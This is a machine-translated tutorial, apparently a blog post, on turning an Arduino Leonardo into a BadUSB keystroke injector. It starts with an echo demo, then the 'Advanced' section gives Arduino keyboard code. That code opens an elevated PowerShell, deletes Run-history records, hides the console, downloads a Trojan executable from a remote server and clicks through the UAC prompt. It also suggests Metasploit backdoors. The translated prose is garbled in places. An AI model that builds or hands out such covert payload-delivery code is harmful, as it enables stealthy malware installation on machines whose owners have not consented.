Quickly make teensy BadUSB with Arduino

0x00 Introduction

This article wants to describe the production process of Arduino version Badusb in a simpler way. I know that before this has been a lot of predecessors have written related articles, but small white may also be a little confused, so this article is a quick introduction to understand, I am also a dish b big God do not spray, thank you ~.

"BadUSB" is one of the hottest topics in computer security, discovered jointly by Karsten Nohl and Jakob Lell, and announced at the Blackhat security conference in 2014. Although it has been a year or two, there are still people studying it, and the way it attacks is varied.

The first part of the relevant BADUSB introduction reproduced in: HTTPS://SECURITY.TENCENT.COM/INDEX.PHP/BLOG/MSG/74

BADUSB principle

Before introducing the principle of BADUSB, the author introduces the following BADUSB before the advent of the first, using HID (Human interfacedevice, is the computer directly interact with the device, such as keyboard, mouse, etc.) to attack the two types. Are "USB rubberducky" and "teensy" respectively.

Teensy Introduction

When an attacker makes a custom attack device, an attack chip is placed into the USB device, which is a very small and fully functional microcontroller development system, called teensy. With Teensy you can simulate a keyboard and mouse, when you plug in this custom USB device, the computer will be recognized as a keyboard, using the device's microprocessor and storage space and programming into the attack code, you can send control commands to the host, so that full control of the host, regardless of whether AutoPlay is turned on, Can all succeed.

About Teensy, you can refer to Tian Rong Letter Alpha Lab's "HID attack teensy Combat"

USB RUBBER Ducky Introduction

Referred to as USB rubber duck, is the first key injection tool, through the embedded Development Board implementation, and later developed into a fully fledged commercial key injection attack platform. It also works by simulating the USB device as a keyboard, making the computer recognize the keyboard, and then scripting the keystrokes.

These two types of attacks, before the release of the Badusb, are more popular two hid attack methods, the flaw is to customize the hardware equipment, the commonality is poor. But Badusb is not the same, it is the "USB RUBBER DUCKY" and "teensy" attack method based on the use of universal USB devices (such as a USB stick).

Internal structure of U disk

The USB flash drive consists of two parts: Chip controller and Flash memory, chip controller is responsible for communication and identification with PC, flash memory is used for data storage, part of flash memory is used to store the firmware of U disk, it acts like operating system, controls hardware and software interaction, firmware cannot be read by ordinary means.

The BADUSB is the reverse reprogramming of the firmware of the U disk, which is equivalent to rewriting the operating system of the U disk to attack.

USB Protocol Vulnerability

Why rewrite the firmware? Below we can look at the security holes in the USB protocol.

There are many USB devices, such as audio and video devices, cameras, etc., so the system is required to provide maximum compatibility, or even drive-free; So when designing USB standards, each USB device is not required to have a uniquely identifiable MAC address like a network device to validate the system. Instead, a USB device is allowed to have multiple input characteristics. This can be done by rewriting the USB stick firmware, disguised as a USB keyboard, and through the virtual keyboard input integrated into the USB stick firmware in the instructions and code to attack.

BADUSB Using code Analysis

The author of Karstennohl and Jakob Lell published code for a simple process analysis.

Such a USB flash drive with malicious code is generated, in more detail you can search Karsten Nohl and Jakob Lell published code.

0x01 production process

Good nonsense we don't say much, just start it ~ we are using Arduino to make teensy. Arduino is a small programmable computer called a microcontroller as simple as possible to be used, and the microcontroller can let the object get interactive function.

Let's take a look at the materials we need to prepare.

Arduino Leonardo//Small microcontroller analog USB

Arduino IDE//Compiler for burning code http://www.arduino.cn/thread-5838-1-1.html

Android Data Cable//for connecting computer USB

PC a//ok we can get started.

Extension: The pursuit of the perfect classmate can be considered-ultra-short micro-turn USB

Arduino Leonardo MCU we can go to the major e-commerce platform to Amoy, especially what the goods are some e-commerce platform, I believe you can definitely find.

I had already bought the micro-turn USB results when I picked up the two of them ready to snap ~ ~ ~

On the spot, tell me why not plug in ~ ~ ~ as a souvenir, so I first as a cannon fodder, I hope other small partners do not like me ~ ~

Interested to think about this thing called the OTG adapter. I've handed over my body again. The discovery is true .... can have!

Good ~ Everyone first installed the Arduino IDE installation process is very simple is the next step, no difficulty.

Open the IDE when you are ready to install.

Open Our IDE

After the IDE has been revised, the boot interface has changed, not the previous version. This is what happens when you open it:

Well, then we'll start coding, but before we do, we need to plug in the Arduino Leonardo first. Then we first save the project file, we recommend that you save directly on the desktop.

Then you'll have a demo folder on your desktop

Inside the folder is our demo file. Well, let's start writing code:

void Setup () {  //Put your setup code here, to run once:}

This code is the initialization of our program.

void Loop () {  //Put your main code here, to run repeatedly:}

This piece of code is where we want to loop.

The above is just the program to give us a good framework, the actual code to our own to write. We let the USB to operate the computer mainly to achieve automatic keyboard operation, so we will use the Arduino keyboard function

#include <Keyboard.h>  //header file with keyboard module keyboard.begin ();  Turn on keyboard communication keyboard.press ();  Press a key keyboard.release (); Release a key keyboard.println (); /* Input some content and some on-line explanation different online explanation is the input content and can enter, while I test the time and can not enter may and version related do not worry about having the way to enter */keyboard.end ();  End Keyboard Communication

OK, these are the main functions we use.

Well, now I'm writing some simple code, and then you can get a sense of what the code means:

#include <Keyboard.h>//Include keyboard module header file void Setup (); Initialize Keyboard.begin ();//Start the keyboard communication delay (1000);//delay 1000 milliseconds, not too short, because every day the computer running speed is not the same keyboard.press (Key_caps_lock); Press the uppercase key here, we'd better write this. Otherwise, most computers will have problems with Chinese input keyboard.release (key_caps_lock); Release the capital key delay (500); Keyboard.press (Key_left_gui);//press the logo key is the win key delay (500); Keyboard.press (' R ');//press R key delay (500); Keyboard.release (Key_left_gui);//Loose win key keyboard.release (' R ');//Loose R key delay (500); Keyboard.println ("cmd");//input cmd enters Dosdelay (500); Keyboard.press (Key_return);  Press ENTER Keyboard.release (Key_return); Release enter delay (500); Keyboard.println ("Echo First Test"); Keyboard.press (Key_return);  Press ENTER Keyboard.release (Key_return); Release enter delay (500); Keyboard.press (Key_caps_lock); Press the capital Key Keyboard.release (Key_caps_lock); Release the uppercase key we turn off the open caps key again delay (500); Keyboard.end ();//end keyboard Communication} void loop ()//loop, where the code {//Loop body writes the code you want to loop}

Well, now we're going to write the code into the IDE.

Then we have to choose the right Development Board and COM port, each computer is not the same.

Everything is ready. We click Compile to see if the program will execute properly.

Tip These instructions we compiled successfully.

Then we are the last step to success--upload.

Once the upload is successful, the computer will automatically disconnect the USB and then reconnect, then the Arduino Leonardo will automatically run.

Let's take a look: start with the upper case key and then open the Run window and then enter CMD and go back to the carriage.

The program then enters Echo first test and executes the carriage return ~~!! It's done!

The above is using the Arduino Leonardo to automate the Ehco operation, simulating a badusb.

0X02 Advanced

So I share my code--the main implementation of the function is to download our Trojan from the remote server and then execute, and will not produce records, and the students on the net to achieve the same purpose, but the code may be biased. Well then look at the code, because of the length of the reason, I directly posted, the main implementation of the code block.

The students who need to stick their own stickers

Keyboard.println ("Powershell.exe-command start-process powershell-verb runAs");  /* Turn on administrator-level powershell*/keyboard.println ("reg delete Hkcu\\software\\microsoft\\windows\\currentversion\\explorer\ \runmru/f "); /* Clear the record generated by the running window */keyboard.println ("cmd.exe/t:01/k mode con:cols=16 Lines=1"); Let the cmd window become a very small window keyboard.println ("$P = New-object SYSTEM.nET.wEBcLIENT"); Use PowerShell to define an object Keyboard.println ("$P. DOWNLOADfILE (' HTTP://192.168.0.109/SUPER.EXE ', ' c:\\super. EXE ') ");  /* Download the virus server address from the service side and the Trojan to specify that the trojan will be stored on the target address itself set *///himself to think of a more stupid way to bypass UAC  is to ask the administrator to agree with the box keyboard.press (Key_left_ ARROW); Press and hold left ARROW key keyboard.release (Key_left_arrow); Release LEFT ARROW key keyboard.press (Key_return); Press ENTER Keyboard.release (Key_return);//Release the ENTER key

Note ~

1. Why we have to open the Admin PowerShell is because the file from the server to download the first CMD does not support, and then even if we call PowerShell in CMD that is not an administrator download error. So we have to open the Administrator's PowerShell in fact, the operation of the download file code there are many kinds of I here is a if you have a better way to download and I say thank you command strange people to play their own

2. Also note that when programming in the IDE, the specified directory is to use \ \ double Slash.

3. The letters of these commands are case-sensitive, because we do this operation at the beginning of the program by opening the uppercase key, so we want to restore the real letters in the IDE to the lower case to uppercase, uppercase to lowercase so the program output is the result we want

4. There is also the delay (); Take this thing for yourself, not to say that the value is unique. I might be relatively slow here.

Finally attach the key value comparison table

Key hexadecimal value Decimal valuekey_left_ctrl 0x80 128key_left_shift 0x81 129key_l     Eft_alt 0x82 130key_left_gui 0x83 131key_right_ctrl 0x84 132key_right_shift         0x85 133key_right_alt 0x86 134key_right_gui 0x87 135key_up_arrow 0xDA 218key_down_arrow 0xd9 217key_left_arrow 0xd8 216key_right_arrow 0xD7 215key_backspa         CE 0xb2 178key_tab 0xb3 179key_return 0xb0 176key_esc 0xb1 177key_insert 0xD1 209key_delete 0xd4 212key_page_up 0xd3 211KEY       _page_down 0xd6 214key_home 0xd2 210key_end 0xd5 213key_caps_lock         0xC1 193key_f1 0xC2 194key_f2 0xC3 195key_f3 0xc4             196key_f4 0xC5 197key_f5 0xC6 198key_f6 0xC7 199key_f7 0xC8             200key_f8 0xc9 201key_f9 0xCA 202key_f10 0xCB 203key_f11 0xCC 204KEY_F12 0xCD 205

Of course, my side of the code is relatively simple no control statements and other functions, interested students can see this handy programming knowledge, so that the BADUSB more intelligent, will judge.

We can also combine Metasploit for backdoor, Trojan implant, or some batch processing files, make their own computer mess, haha ...

This article may be offensive and should not be used for illegal purposes. Personal research is completely no problem, all responsibility and I have nothing to do, if there is insufficient place to guide, thank you.

Reference documents:

Http://www.myhack58.com/Article/60/76/2014/56812.htm

http://zone.wooyun.org/content/17931

Http://www.freebuf.com/articles/terminal/6182.html

Https://security.tencent.com/index.php/blog/msg/74

Quickly make teensy BadUSB with Arduino